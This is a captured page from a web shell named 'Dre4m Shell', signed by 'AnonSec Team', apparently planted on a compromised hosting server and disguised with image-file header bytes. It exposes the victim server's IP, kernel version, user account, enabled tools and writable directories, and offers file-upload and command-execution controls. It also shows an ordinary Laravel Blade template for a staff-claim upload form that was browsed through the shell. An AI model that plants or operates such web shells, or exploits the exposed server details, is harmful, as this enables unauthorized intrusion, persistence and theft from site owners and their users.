ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.222.119.237
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/StaffClaim/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/StaffClaim/modalBodyUploadFile.blade.php
<div class="modal fade" id="showUploadModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
   <div class="modal-dialog" role="document">
<form method="post" action="{{route('uploadStaffFileClaim')}}" enctype="multipart/form-data">
{{ csrf_field() }}
    <!-- Trigger/Open The Modal -->
    <span id="myBtn"></span>
    <!-- The Modal -->
    <div>
        <!-- Modal content -->
        <div class="modal-content">
            <span class="close">&times;</span>
            <div align="left" class="modal-header">
               <b>{{$modalHeader}}</b>
            </div>
            <div align="center" class="modal-body">
                <p>{!! $modalMessage !!} for <b><span id="showContractorName"></span></b> (e.g receipt, etc).</p>
            </div>
            <div class="col-md-12">
                <div class="form-group">
                    <label for="caption">Short Description</label>
                    <input type="text" id="caption" name="caption" required class="form-control" />
                    <br />
                    <label for="attachFile">Attach File <small class="text-warning">(Max: 5MB - image, pdf)</small></label>
                   	{!! $modalField !!}
                    <input type="hidden" id="staffClaimID" name="staffClaimID" />
                    <strong>
                        <small><span class="text-danger" id="errorCallBack"></span></small>
                    </strong>
                </div>
                <hr/>
            </div>

 	  <div class="modal-footer">
            <div class="row">
                <div align="right" class="col-sm-6">
                    <button type="submit" class="btn btn-success">Upload <i class="fa fa-upload"></i></button>
                </div>
                <div align="left" class="col-sm-6">
                    <button type="button" data-dismiss="modal" class="btn btn-default">Cancel</button>
                </div>
            </div>
	  </div>
        </div>

    </div>
</form>
</div>
</div>

Anon7 - 2022
AnonSec Team